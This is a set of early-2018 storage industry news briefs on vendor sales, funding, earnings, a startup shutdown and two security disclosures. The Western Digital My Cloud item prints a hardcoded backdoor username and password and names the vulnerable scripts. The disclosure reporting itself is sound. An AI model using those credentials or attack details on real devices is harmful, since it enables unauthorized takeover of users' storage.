Despite all the talk about object storage over the years, it has yet to push scale-out NAS out of the enterprise for storing files that take up hundreds of terabytes to petabytes of capacity. But early object storage vendor Caringo reports progress, with a 40% year-over-year sales increase in 2017 due to a heavy expansion of the footprint of previous customers along with an intake of new customers.
Caringo also reported 50% growth in the fourth quarter compared to the previous year. Adrian Herrera, vice president of marketing at Caringo, said most of the increase is due to previous customers adding capacity to their Caringo Swarm object storage implementations.
“We are seeing customers start with hundreds of terabytes and expanding to multiple petabytes,” he said.
Herrera said Caringo Swarm scale-out hybrid cloud object storage is picking up steam with the media and entertainment companies. Caringo has partnered with Reach Engine by Level Beyond, Pixit Media and CatDV to serve that market. He said as companies become more familiar with the Amazon S3 API, they warm to object storage.
“It’s really because of the Amazon S3 API acceptance,” Herrera said. “There are some asset managers that we have been certified with and their adoption of the S3 API makes it easy for us to plug into their solutions.”
Herrera said Caringo Swarm sales are also growing in local and federal government and high-performance computing markets.
Still, with its target customer storing such large data sets, the sales process remains lengthy for object storage deals.
“It’s not uncommon to see a deal take about a year,” Herrera said. “Object storage deals take a long time. But it is compressing. The sales process is accelerating because people are a lot more comfortable with object storage.”
Jon Toigo, CEO and managing partner at Toigo International Partners, credited Caringo with helping to lead the wave of object storage vendors embracing Amazon Web Services’ public cloud.
“Many object-level storage companies, citing client cloud storage preferences, started emulating Caringo by adding Amazon Web Services storage compatibility to their kit,” Toigo wrote in a December 2017 Storage Magazine article. “Some added file system-like interfaces to help users who understood the hierarchical file systems better than mystical object storage and access methods.”
Kaminario is the latest vendor to deemphasize hardware in favor of a solely software-defined approach.
Under its new strategy, customers will buy Kaminario storage as a reference stack from global reseller TechData Corp., which will integrate the software on standard appliances. The companies inked a distribution deal in January.
Kaminario on Wednesday released the first product under the new software-only model: Kaminario Cloud Fabric, a usage-based utility aimed at midsized IT services providers. Cloud Fabric licenses customers to access composable infrastructure on demand with all-flash K2 storage arrays, the Kaminario flagship.
Prior to the deal with TechData, Kaminario relied on contract manufacturers to build K2 all-flash systems, but it owned the hardware inventory and associated financial and forecasting risk.
TechData will capture hardware revenue, while Kaminario storage revenue going forward will be solely from software licenses. Josh Epstein, Kaminario’s chief marketing officer, said TechData will handle asset tracking and inventory.
“All of our IP historically has been in software. We don’t do custom hardware engineering. To date, we have shipped our arrays as a fully integrated appliance, but we are moving to a software-only operational model. This move positions us for better operational and financing efficiency, and we’ll pass those efficiencies on to our customers,” Epstein said.
Amazon, Facebook, Google and other hyper-scale cloud data centers run on infrastructure built with proprietary hardware stacks from white-box servers. Epstein said Kaminario Cloud Fabric gives midrange service providers a similar advantage.
Kaminario Cloud Fabric is an enterprise-wide software utility licensed per consumed storage, regardless of where users are located. The goal is to qualify Kaminario storage with general purpose servers. K2 all-flash arrays to date have exclusively used Supermicro enclosures and SAS SSDs.
Epstein said many of Kaminario’s larger storage customers want to buy IT as a service. He said cloud and SaaS customers account for roughly 85% of Kaminario’s business.
“They want to move to a hyper-scale environment, but there is a lot of risk associated with vendor lock-in, regulatory concerns and overall pricing. We want to help them mitigate that risk.”
The Cloud Fabric license incorporates the standard Kaminario storage software stack, including the VisionOS operating system and Kaminario Clarity analytics and monitoring. Integration of Kaminario Flex automation and orchestration will be added upon general availability later this year.
Igneous Systems today closed a $15 million Series B funding round to help expand marketing of its hybrid cloud backup and archiving platform for file data.
Igneous Hybrid Storage Cloud consists of the startup’s software packaged on commodity appliances that protects data on-premises and in public clouds. The startup handles all the management of the data, which includes analytics and the ability to replicate it to the cloud.
“We consolidate backup and archiving with as little or as much on-prem, or as much or as little in the cloud as the customer desires,” Igneous CEO Kiran Bhageshpur said. “We deliver all as a service, even if the infrastructure is in the customer‘s data center. The customer does not monitor anything, they don’t get any alerts, they don’t worry about things completing or not. Our software takes care of all that.”
Bhageshpur said the funding will allow the company to add systems engineers and sales managers, mainly in North America. “We are hyper-focused on expanding our go-to-market side,” he said. Igneous Systems has about 40 employees today, Bhageshpur said.
The Igneous Hybrid Storage cloud has been generally available for less than a year. Bhageshpur said Igneous is still in the “low double digits” of customers but they include Fortune 250 and Global 2000 firms. He said the typical Igneous Systems customer has “lots of file data, as in hundreds of millions of files to billions of files, and hundreds of terabytes to petabytes to tens of petabytes of data. And the data is in multiple systems in multiple locations.”
“We index data no matter where it lives,” he said. “We scan data, store data, and move data off to the cloud. We do a global search of all that data that is being backed up. And we will extend that functionality because we index everything. You’re talking about hundreds of millions to billions of objects. All of that is searchable in Google-like fashion. We tell you things like how much data do you have, what is your change rate, and what’s the rate of access of your data. Our vision is to take that to the next step. Storage analytics is the first piece, but there are other things we can do that looks more deeply into that data.”
Igneous Systems’ subscription pricing starts at about $30,000 a year for 200 TB of usable data under protection. Bhageshpu said Igneous includes all its current core features in the subscription price but will add new functionalities for a premium.
“This is strictly hypothetical, but say we build in compliance enforcement,” he said. “If a customer says, ‘Provide insights into a GDPR violation,’ that would be an added charge.”
Vulcan Capital and Orca Bay Capital joined original Igneous Systems investors Madrona Venture Group, New Enterprise Associates, and RedPoint Ventures in the round. The round brings the company’s total investment to just over $41 million.
Bhageshpu said Stephen Mullaney is joining the board as an independent director. Mullaney was the CEO of network virtualization startup Nicira, which VMware acquired in2012 as the underlying technology for its NSX software-defined network platform. Mullaney left his SVP role at VMware in 2014 and currently sits on several boards, including Barracuda Networks, Metaswitch Networks, Tigera and Tula Technology.
Is the Dell EMC storage merger causing buyer’s remorse?
According to published report, Dell Technologies is considering a return to the public market to satisfy the massive debt incurred from its 2016 merger with EMC. Options under consideration include an initial public offering of stock or a reverse merger with VMware, of which Dell already owns a majority stake.
The news comes less than 18 months after the Dell EMC storage merger was finalized, uniting the world’s No. 1 server vendor with the largest enterprise storage vendor by revenue.
Going public is one of several options reportedly being explored, but no decision has been reached. Dell EMC executives would not confirm the published reporting, which was first reported by Bloomberg. The company’s board of directors is expected to meet soon to hash out strategic options.
An interesting sidelight to a potential stock offering involves the impact on valuation of VMware. Dell owns 81% of VMware. A reverse merger would allow Dell to free up liquidity, while avoiding the expense and additional scrutiny of an IPO. VMware revenue surged nearly 14% last quarter to $785 million from licenses, reflective of more companies moving to the cloud.
Dell bought most of EMC’s interest in VMware as part of the deal, offering it as tracking stock that was used to help finance the merger. It’s also possible Dell could acquire the remaining stake in VMware and spin it off as a separately traded equity. Shares of other EMC Federation properties, such as Cloud Foundry or Pivotal Software, also could be offered as separate shares.
Greg Schulz, senior advisory analyst at Server and StorageIO, said Dell EMC faces storage challenges common to most legacy vendors.
“The demand for storage continues to grow, but so too do the options for customers to choose where, how and from whom they will consume it. Cloud providers are challenging traditional storage vendors, as are dynamic startups. It’s a dynamic buyers’ market, which means storage vendors need to start thinking in terms of new opportunities,” Schulz said.
Legacy Dell EMC storage gives way to VxRail, VxRack converged infrastructure
Dell EMC is carrying roughly $46 billion in debt financing related to the merger, and $3 billion in debt maturities start coming due in April. Part of the debt will be serviced from cash reserves of nearly $12 billion, but Dell apparently is exploring other avenues as a hedge against revenue declines related to its legacy networked storage.
Network and server revenue soared 32% during the last quarter, but Dell EMC storage revenue of $3.7 billion remained essentially flat for the second consecutive quarter.
Dell EMC closed last quarter carrying $52.5 billion in debt, up $2.6 billion from the prior quarter. The total debt balance increased in part due to VMware’s $4 billion bond issuance and about $300 million in increased structured financing for Dell Financial Services.
In separate but related news, Dell EMC said it is reshaping its Infrastructure Solutions Group (ISG),which encompasses networking, servers and storage – a move that recognizes how its traditional storage business is ceding ground to VxRack and VxRail converged infrastructure. The Dell EMC ISG unit is headed by longtime Dell executive Jeff Clarke, who took over when EMC veteran David Goulden retired last year.
Company officials disputed published reports that said the ISG shakeup was aimed to bolster Dell EMC storage revenues. However, the shifting strategy will use converged and hyper-converged platforms as the “tip of the spear.”
“Dell EMC has rolled out a new internal structure, designed to help simplify our organization for clear lines of decision making, get our products to market faster and align our teams to our biggest priorities. This will allow our product teams to accelerate active roadmap decisions as well as long-term product strategy and innovation,” Dell EMC said in a prepared statement explaining its decision.
“This new structure includes moving our converged and hyper-converged solution teams into the core product teams they work with most, to get Dell EMC innovation in the hands of our customer more quickly.”
Dell was a public company until 2013, when Michael Dell took the company private in a $25 billion transaction underwritten by equity firm Silver Lake Partners, which also provided $1 billion to orchestrate the EMC takeover. More recently, Silver Lake has ponied up a reported $5 billion to back networking giant Broadcom Ltd.’s buyout of Qualcomm Inc.
Commvault generated $180.4 million in revenue last quarter, which was its biggest revenue quarter ever but still missed Wall Street’s expectation of $182 million. The company blamed the small shortfall on large million-dollar deals that were pushed out during the September quarter and then failed to close in the December quarter.
The backup and data management company’s revenue represented an 8% increase over the prior year and 7% sequential increase. Commvault lost $59 million in the quarter, which CFO Brian Carolan attributed to two large non-cash income tax charges.
“We had a good sequential increase in our software growth, solid billings growth and strong operating cash flow,” CEO Bob Hammer said on the Commvault earnings call with analysts. “I’m also encouraged by our progress on certain key strategic initiatives, including the launch and early traction of our Commvault HyperScale appliance and good funnel build with our Commvault HyperScale software.”
This is the second straight quarter that Commvault missed expectations. While Commvault’s revenue miss was not as large as in the previous quarter, Hammer said his company’s inability to close big deals by the end of the quarter caused it to fall below expectations again.
“As we have discussed for many quarters, we are currently reliant on a steady flow of large six- and seven-figure deals, which come with additional risk due to their complexity and timing,” he said.
Hammer said some of the large deals from the previous quarter did close last quarter, but not as many as he expected “and close rates were below historical levels,” he said.
A Wells Fargo Securities analyst report called the Commvault earnings “modestly disappointing” but said the vendor remains positioned for growth.
“Commvault’s modest revenue miss was driven by an increase in subscription contributions, which accounted for 20 percent of total software license revenue and the impact to revenue reflects lower pricing on subscription versus traditional perpetual licenses,” the Wells Fargo report stated. “Our conversation with Commvault management noted that the payback period on subscription licenses are about three to five years.”
Hammer said the move to a subscription pricing model has confused some customers.
“While we also need to improve our close rates on these deals, large deal closure rates will likely remain lumpy,” he said. “We are also moving to new pricing models. While we are happy with the progress we are making on subscription pricing, our transition in pricing models has cost some market confusion, which we are rectifying.”
On the Commvault earnings call, Hammer said his focus for growth for the coming year is to help large enterprises move to the cloud and mitigate risk from cyberattacks such as ransomware.
Commvault is also counting on its HyperScale Appliance, which is built on Fujitsu hardware that is virtualized via Red Hat Linux and uses the Red Hat Cluster OS for a scale-out file system. The HyperScale platform hit the market in late 2017 and hasn’t generated much revenue yet.
Hammer denied Commvault’s closing problems are due to tougher competition. Besides large data protection vendors such as Veritas and Dell EMC, Commvault is also under fire from rapidly growing rivals Veeam Software, Cohesity and Rubrik.
Commvault HyperScale launched at least in part to battle similar integrated appliances from Rubrik and Cohesity.
“We bump into them every day,” Hammer said when asked about those smaller rivals. “I mean it’s the lower end of the market, but we clearly see those competitors out there. And fortunately we got into market relatively quickly with our HyperScale appliance.”
Primary Data CEO Lance Smith has refused to confirm published reports that the storage software startup has closed shop.
Reached Tuesday evening at his Primary Data office telephone number, Smith said, “There’s nothing I can comment on at this time.”
That suggests Smith may be trying to salvage the company, but he did not confirm that or anything else about a possible Primary Data shutdown.
Despite news of a Primary Data shutdown spreading across the storage industry, the startup’s website remains up and shows no sign of trouble.
Primary Data tried to tackle the problem of data management on premises and in the cloud with its DataSphere software. The company boasted a veteran executive team that included Apple co-founder Steve Wozniak as chief scientist and Fusion-io co-founders David Flynn and Rick White, as well as Smith, Fusion-io’s former president and chief operating officer. SanDisk acquired server-side flash pioneer Fusion-io for $1.1 billion in 2014.
The reported Primary Data shutdown comes barely five months after the startup picked up $20 million in funding and a $20 million line of credit. Primary Data had emerged from stealth in late 2013 with $50 million in financing led by Accel Partners. Other investors included Battery Ventures, Pelion Venture Partners, Lightspeed Venture Partners and Wing Capital Group. The startup also reportedly secured another $10 million in 2014.
TechCrunch reported this week that Primary Data was shutting down, citing unnamed sources who indicated the startup’s financial backers balked at a request to convert their preferred shares to common stock.
More news of a Primary Data shutdown surfaced in a story posted on CTech, a technology news site focusing on the Israeli tech scene. CTech, which is affiliated with the Israeli business newspaper Calcalist, published the following email that was reportedly sent to Primary Data’s remaining employees in Israel from Eric Iverson, whose LinkedIn profile lists his title as “senior director total rewards” at Primary Data:
“Primary Data is suspending operations and your last day is January 21. Unfortunately, our funding did not materialize in time to avoid termination of your employment. We know this is sudden but we need to release you now while we still have the funds to make a final pay to you for the days you have worked.”
Calcalist reached one of Primary Data’s board members by phone. According to Calcalist, the board member said, “With too much money, companies lose focus and their sense of urgency when it comes to getting paying customers and selling as a first priority.”
Primary Data’s site lists offices in Los Altos, California, Salt Lake City, Utah, and Tel Aviv, Israel. According to Calcalist, the Tel Aviv development center once employed approximately 50 people, many of whom came from the storage divisions of IBM and EMC in Israel. The company notified employees in the summer of 2016 that the Israeli site would be downsized, and by last week there were only five employees left, Calcalist reported.
Marc Staimer, president of Dragon Slayer Consulting, said Primary Data was one of only a handful of players that had “taken on the challenge” of content data management – a problem he said has become more difficult to solve because of the explosive growth of data, the different types of metadata and the many locations where organizations can store data. He said competitors such as Komprise and StrongBox are doing well sales-wise.
However, another software-defined storage startup, Formation Data Systems, suddenly closed in June 2017.
“Conceptually, I thought Primary Data was doing a good job, but you just don’t know unless you’re inside the company,” Staimer said. “I had gotten no whiff of anything negative in the last few months. There was nothing in the rumor mill, the blogosphere or the VC community that even hinted that they were in trouble.”
Whatever led to the reported Primary Data shutdown, it occurred so abruptly that an industry analyst said the startup had approached him just last week about doing a webinar.
A Cohesity executive wants to make something clear about the company’s self-described product line.
“Hyper-converged secondary storage is not a trend,” chief marketing officer Lynn Lucas said. “It’s a category.”
The numbers in the most recent Cohesity revenue report shine a light on that statement. The vendor reported a 600% year-over-year increase in 2017 sales revenue. Over the past eight months, Cohesity’s new customer count doubled. The company does not report exact revenue or customer figures, though Patrick Rogers, its vice president of marketing and product management, said Cohesity storage has hundreds of customers.
Cohesity is entering its third year of selling products and aims to be the platform for converging all non-primary storage. Its customers include a dozen Fortune 500 companies. New customers include the U.S. Department of Health and Human Services, the U.S. Department of Energy, the U.S. Air Force and the University of California at Santa Barbara. In addition, international business produced more than 30% of bookings in 2017.
Hyper-convergence initially focused on primary storage. When Cohesity and fellow startup Rubrik emerged, analysts called their products converged secondary storage because they planned to handle all non-primary workloads. But with hyper-converged primary and converged secondary storage both growing healthily, the newcomers call their systems hyper-converged secondary storage.
“[Hyper-converged secondary storage] is a category and the enterprise is continuing to adopt it,” Lucas said.
Cohesity claims customers in financial services, media and entertainment, health care and high tech are using its storage for at least 1 PB, Rogers said. One customer has 4 PB in Cohesity storage. One petabyte equals 50 nodes.
The vendor also claims most of its customers use its cloud services. Cohesity has partnerships with Amazon, Google and Microsoft.
Cohesity recently launched its DataPlatform Cloud Edition, which now runs on Amazon Web Services and Microsoft Azure. DataPlatform serves as the underlying file system that manages storage across the Cohesity nodes, handling features such as data deduplication, compression, encryption and tiering.
Cohesity’s early competition came from Rubrik, which bills itself as “The Cloud Data Management Company” and raised $180 million in a 2017 round for a total of $292 million in funding. But larger companies are also getting into the game, including backup vendor Commvault with its HyperScale platform that Cisco also sells as ScaleProtect on the Cisco Unified Computing System.
Cohesity getting hyped for growth
In April 2017, Cohesity raised more than $90 million in a funding round that included investments from Google, Hewlett Packard Enterprise (HPE) and Cisco. Cohesity has raised more than $160 million in three funding rounds.
Cohesity doubled its workforce over the last year. It now has more than 300 employees, including 100 hired in the last few months, and plans to hire more. Its new San Jose, Calif. headquarters was built with room for growth, Lucas said.
One of the new hires is Lucas, who started recently as Cohesity’s first CMO after previous stints with Veritas Technologies and Cisco. Cohesity says she was hired to strengthen the leadership team, increase customers and accelerate company growth.
Cohesity also recently hired former NetApp president Rob Salmon as its first president and COO.
Strategy for the year ahead includes tackling all forms of secondary storage beyond data protection uses — such as test and development and analytics — and increasing adoption of cloud infrastructure, Rogers said.
Challenges include spreading the word about hyper-converged secondary storage. In addition, customers have more data but want to spend less.
“Hyper-converged secondary storage is a part of the enterprise data center that hasn’t been consolidated,” Rogers said, which presents an opportunity for Cohesity.
Acquisitions are not on the table, Rogers said.
“The horsepower here from an engineering talent perspective is really unbelievable,” Lucas said, citing founder and CEO Mohit Aron, founder of hyper-converged pioneer Nutanix, as an example. One of Aron’s goals is to converge data protection in a similar manner to the way Nutanix converges primary data.
Cohesity also has some important strategic partners, including Cisco and HPE, Rogers said. HPE, for example, is reselling pre-configured, scale-out Cohesity storage combined with HPE’s enterprise-class servers and network switches.
Aided by gains in cognitive analytics, cloud and storage, annual IBM revenue has finally returned to positive territory after an absence of nearly six years.
IBM last week closed its 2017 fiscal year by posting quarterly revenue of $22.5 billion, up 4%. Earnings for the full year remained flat at of $79.1 billion. The vendor used the earnings call to formally introduce longtime IBM executive James Kavanaugh as its new CFO.
“This is … four quarters in a row (that) we’ve grown storage. And that’s been based on the great work our storage team has done (in) repositioning the portfolio, leveraging and growing share in flash. But it’s also about software-defined and also….object storage that will continue” to provide growth markets, Kavanaugh said.
Cloud initiatives generated IBM revenue of $17 billion, up 27% on a currency-adjusted basis. The revenue figure Includes $9.3 billion from software-as-a-service offerings and nearly $8 billion in hardware, software and services to help companies build IBM-based private clouds. Sales of IBM storage hardware jumped 8%, although IBM does not break down revenue by individual storage products.
The overall results snapped IBM’s string of 23 consecutive losing quarters. The return to revenue growth stems from an IBM strategy shift intended to “significantly improve the trajectory” in burgeoning sectors during the past year, said Martin Shroeter, IBM senior VP of global markets.
“Back in July, we planted the flag for our businesses and we pointed to an improved trajectory in the second half. As we look back on the year, we (were able to) significantly improve the trajectory in our revenue and our gross margin performance. We did this by ramping up our cloud and as-a-service offerings and by continuing to reinvent” with its new IBM Z mainframe and AI-focused Power9 processor.
IBM revenue is broken into four segments:
- Cognitive Solutions: $5.4 billion, up 3%
- Global Business Services: $4.2 billion, an increase of 1%.
- Technology Services/Cloud: $9.2 billion, down 1%.
- Systems (including storage): $3.3 billion, up 32%
A fifth segment, global financing, helps customers underwrite the sale of used IBM equipment. Those activities produced $450 million last quarter.
Schroeter said fourth-quarter cloud revenue of $5.5 billion were up 27% on a currency-adjusted basis. The IBM Systems group, which includes system hardware and operating-system software, produced $3.3 billion, a jump of 28 percent.
For the year, IBM derived $17 billion from its enterprise cloud initiatives, including $9.3 billion from software-as-a-service offerings and nearly $8 billion in hardware, services and software to help companies build IBM-based private clouds.
IBM storage revenue has been a bright spot of late. Fueled in part by surging demand for all-flash storage, the latest filing marks the fourth consecutive growth quarter in storage. Revenue from IBM Z Systems mainframe rose more than 70%, thanks to pervasive encryption included in the latest version of the product. Systems hardware sales overall jumped 35%, offset by flat OS software revenue.
“We gained share in a very competitive market while holding margins stable. We had double-digit growth in our high-end hardware products for the quarter, which reflects the demand for flash as well as the capacity increase linked to mainframe demand. Our all-flash array offerings once again grew at a strong double-digit rate and faster than the high-growth all-flash market,” Schroeter said.
Increased flash sales are linked to the IBM Watson cognitive computing. Schroeter said IBM added more than 1,000 customers to its array of Watson-linked verticals, which include Watson Financial, Watson IoT and Watson Health. In addition, IBM and Massachusetts Institute of Technology (MIT) formed the IBM-MIT Watson partnership to unlock AI-based research.
Schroeter said IBM cloud and cognitive analytics are being integrated in more offerings as part of its Strategic Imperatives framework introduced in 2015, which now accounts for 46% of all IBM revenue.
Western Digital released a firmware update last year to address critical backdoor security vulnerabilities in its My Cloud NAS products but the company this week acknowledged more security issues with the devices still need to be addressed with firmware updates.
Western Digital addressed the My Cloud NAS security issues on certain models in a corporate blog post that was updated Tuesday. It stated that hackers could exploit default settings under several conditions: if they have access to the owners’ local network, if the My Cloud owner has enabled Dashboard Cloud Access on certain model or the My Cloud owners enabled additional “port forwarding” to the My Cloud devices.
“To mitigate the issue, we strongly recommend that My Cloud owners who have made such changes disable the Dashboard Cloud Access and ensure their router and My Cloud device are secure by disabling additional port-forwarding functionalities,” the blog post update said. “All affected My Cloud owners should restrict local network guest access only to people they trust. We are working on a firmware update for this issue and will make it available on our support download site as soon as possible.”
The NAS devices are popular among home users and small businesses. The models that are affected include My Cloud, My Cloud Mirror, My Cloud Gen2, My Cloud PR2100, My CloudPR4100, My cloud EX2 Ultra, My Cloud EX2 and EX4, My Cloud EX200, EX4100, DL2100 and DL4100.
James Bercegay, a Gulftech researcher, initially alerted Western Digital about two examples of NAS security flaws in June 2017. One flaw he discovered is My Cloud devices were vulnerable to unrestricted file uploading via the multi_uploadify.php script because it was protected “with faulty logic.”
“This gives you root access to the box,” Bercegay said in an interview Wednesday. “As the file is uploading, it gets written to the disk with the permissions of root. This was code left in there by accident… it makes a request though a non-existent file name of ‘mydlink.cgi.’ You can load up any file you want.”
Bercegay said he also discovered the NAS products have a hardcoded backdoor vulnerability via a single file called NAS_Sharing.cgi, which bad actors can use to gain control of the system to steal data and spread malware. The backdoor vulnerability gives access just by using the username “mydlinkBRionyg” and password “abc12345cba.”
“It gives you complete control,” he said. “You are the ultimate, super user on the device. It means you are God on that machine.”
Bercegay alerted Western Digital, one of the largest hard drive manufacturers in the world, about the NAS security vulnerabilities back in June 2017. The storage company requested the standard 90 days grace period to deal with the issue before disclosing it but it took it six months to release firmware update v2.30.172 that addressed the remote access bugs.
“The triviality of exploiting this issue makes it very dangerous and even wormable,” Bercegay wrote in a Jan. 4 report on the Gulftech website. “Not only that, but users locked to the LAN are not safe either. An attacker could literally take over your WD My Cloud by just having your visit a website where an embedded iframe or img tag make a request to the vulnerable device using one of the many predictable default hostnames for the WD My Cloud such as ‘wdmycloud’ and ‘wdmycloudmirror.’”
Western Digital responded to an interview inquiry regarding the NAS security issues with an email:
“Minor issues are being addressed in future updates,” the company stated in the email. “Additionally, the My Cloud Home model architecturally is designed new from the ground up. We are not aware of any vulnerability to the security issues listed in the respective reports.”
Bercegay said companies should be able to promptly respond to security issues, but sometimes are slow to do so.
“It does not take long to do these things,” he said. “They just don’t prioritize it. There is a lot of bureaucracy and red tape, especially when it comes to security. (These problems happen in the first place) because of sloppy coding. It’s like 1999 all over again.”
Western Digital was awarded PWNIE Award in 2016 for a vendor that most poorly responded to a security issue.
Users of Dell EMC data protection are being urged to quickly patch three security flaws that could hijack Avamar-based products.
The vulnerabilities revolve around Avamar Installation Manager, a common component in Dell EMC Avamar Server, NetWorker Virtual Edition and Dell EMc’s Integrated Data Protection Appliance (IDPA).
The Dell EMC data protection vulnerabilities were discovered by Digital Defense Inc. (DDI), a San Antonio, Texas, firm that performs vulnerability assessments and penetration tests on behalf of customers in financial services and other regulated industries.
If used in combination, DDI said the zero-day exploits could allow unauthorized users to modify the configuration file to gain root access via Dell EMC backup copies. Security fixes are available for download from Dell EMC to credentialed enterprise customers.
Dell EMC Avamar data protection also powers VMware vSphere Data Protection. VMware has issued a security advisory.
The vulnerability considered most serious is an authentication bypass vector. This mechanism potentially allow a hacker to receive authentication via a basic POST request to the Avamar server. No specific knowledge is required about the targeted Dell EMC backup Avamar server, such as user credentials and passwords, to generate a session ID.
Other identified vulnerabilities include bugs that allow authenticated users to download or upload arbitrary files with root access. Used in combination, the three Avamar-related security holes could fully compromise Dell EMC data protection systems.
DDI alerted Dell EMC to the findings late last year. The two vendors do not have a contractual relationship. Mike Cotton, a DDI senior vice president of engineering at Digital Defense, said DDI downloaded a virtual instance of Avamar Virtual Edition 7.4 as part of routine bench testing.
“We started looking under the covers for any vectors we could use against the remote appliance,” Cotton said.
Dell EMC notified customers of the software fixes on Friday. Spokesman Kevin Kempskie said no Dell EMC data protection systems are known to have been affected.
The Avamar product was acquired by EMC in 2006 primarily for its data deduplication technology. Dell EMC NetWorker Virtual Edition is a software platform that backs up data on multiple operating systems to a variety of targets. Dell EMC IDPA marked the vendor’s first integrated disk-based hardware appliance, a departure from selling its backup software on DataDomain appliances.